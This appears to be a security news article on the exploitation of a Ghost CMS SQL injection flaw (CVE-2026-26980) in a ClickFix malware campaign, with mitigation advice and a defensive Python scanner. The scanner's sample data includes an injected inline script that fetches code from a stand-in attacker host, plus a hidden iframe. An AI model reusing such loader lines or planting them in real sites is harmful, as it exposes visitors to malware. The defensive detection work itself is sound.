Critical SQL Injection Flaw in Ghost CMS Exploited in Large-Scale ClickFix Campaign
A critical SQL injection vulnerability in **Ghost CMS** is being actively exploited in a large-scale campaign, leading to ClickFix attacks. The vulnerability, tracked as **CVE-2026-26980**, allows unauthenticated attackers to inject malicious JavaScript code and compromise websites.

Researchers at **Qianxin**'s XLab threat intelligence team have uncovered a widespread campaign exploiting a critical SQL injection vulnerability (**CVE-2026-26980**) affecting **Ghost CMS**. This vulnerability is being leveraged to inject malicious JavaScript code, triggering ClickFix attack flows on a large scale.
### Scope of the Attack
The XLab researchers confirmed that over 700 domains have been impacted, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs. High-profile institutions such as **Harvard University**, **Oxford University**, **Auburn University**, and even **DuckDuckGo** have been among the compromised sites.

*Source: XLab*
### CVE-2026-26980: The Vulnerability
**CVE-2026-26980** impacts **Ghost** versions 3.24.0 through 6.19.0. It allows unauthenticated attackers to read arbitrary data from the website database, including admin API keys. These keys grant extensive management access, enabling modification of users, articles, and themes.
A patch was released on February 19 in **Ghost CMS** version 6.19.1; however, many sites have yet to apply the necessary security update.
**SentinelOne** published details on February 27 regarding the exploitation of **CVE-2026-26980**, including detection methods. Their research identified multiple distinct activity clusters targeting vulnerable Ghost sites, with some domains being repeatedly infected with different scripts.

*Source: XLab*
### Attack Chain Breakdown
The observed attacks follow a specific pattern:
1. **Exploitation:** Attackers exploit **CVE-2026-26980** to steal admin API keys.
2. **Injection:** They use the stolen API keys to inject malicious JavaScript into articles.
3. **Staging:** The injected JavaScript acts as a lightweight loader, fetching second-stage code from the attacker's infrastructure.
4. **Fingerprinting:** This second-stage code fingerprints visitors to identify potential targets.
5. **ClickFix Lure:** Targeted visitors are presented with a fake **Cloudflare** prompt via an iframe, leading to the ClickFix lure.

*Source: XLab*
Victims are then instructed to paste a provided command into their Windows command prompt, which drops a payload onto their systems. Payloads observed include DLL loaders, JavaScript droppers, and an Electron-based malware sample named `UtilifySetup.exe`.
*Source: XLab*
### Mitigation Strategies
The most critical step is to upgrade to **Ghost CMS** version 6.19.1 or later and rotate all previously used keys, as they should be considered compromised. XLab has provided indicators of compromise (IoCs), including injected scripts, which should be used to thoroughly review websites and remove any malicious code.
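Reviewing a site for the injected loader described in the attack chain above can be scripted. The following is an added defensive example, not XLab's or Ghost's code; it assumes a Ghost JSON content export laid out as `db[0].data.posts[*]` with `html`, `codeinjection_head` and `codeinjection_foot` fields (adjust the paths if your export differs), and an `ALLOWED_HOSTS` allowlist you maintain for your own site. Inline scripts and script/iframe sources on any host outside the allowlist are reported per post and field so they can be checked against the published IoCs.

```python
"""Scan a Ghost content export for injected <script>/<iframe> tags."""
import json
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts your site legitimately loads scripts or frames from (assumption: edit for your site).
ALLOWED_HOSTS = {"cdn.jsdelivr.net"}


class _TagFinder(HTMLParser):
    """Collect (tag, src) for every <script> and <iframe>; inline scripts get src "inline"."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            self.hits.append((tag, dict(attrs).get("src") or "inline"))


def suspicious_tags(html_fragment):
    """Return (tag, src) pairs that are inline scripts or load from a non-allowlisted host."""
    finder = _TagFinder()
    finder.feed(html_fragment or "")
    findings = []
    for tag, src in finder.hits:
        if src == "inline":
            findings.append((tag, src))          # inline loaders are exactly what was injected
            continue
        host = urlparse(src).hostname
        if host is None:
            continue                             # relative src: same-origin asset, not flagged here
        if host not in ALLOWED_HOSTS:
            findings.append((tag, src))
    return findings


def scan_export(export_json):
    """Walk every post and the per-post code-injection fields; return (slug, field, tag, src)."""
    findings = []
    posts = json.loads(export_json)["db"][0]["data"].get("posts", [])
    for post in posts:
        for field in ("html", "codeinjection_head", "codeinjection_foot"):
            for tag, src in suspicious_tags(post.get(field)):
                findings.append((post.get("slug"), field, tag, src))
    return findings


# Constructed sample export: one clean post, one post carrying an inline loader and a hidden frame.
SAMPLE_EXPORT = json.dumps({"db": [{"data": {"posts": [
    {"slug": "welcome", "html": '<p>Hi</p><script src="https://cdn.jsdelivr.net/x.js"></script>'},
    {"slug": "pricing", "html": "<p>Plans</p><script>fetch('https://attacker.invalid/s')</script>",
     "codeinjection_foot": '<iframe src="https://attacker.invalid/cf"></iframe>'},
]}}]})
```

Run `scan_export` over a fresh export before and after upgrading, and treat any hit that you did not place yourself as a post to clean and a key to rotate.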
Website owners are also advised to maintain a 30-day record of admin API call logs to facilitate effective retrospective investigations.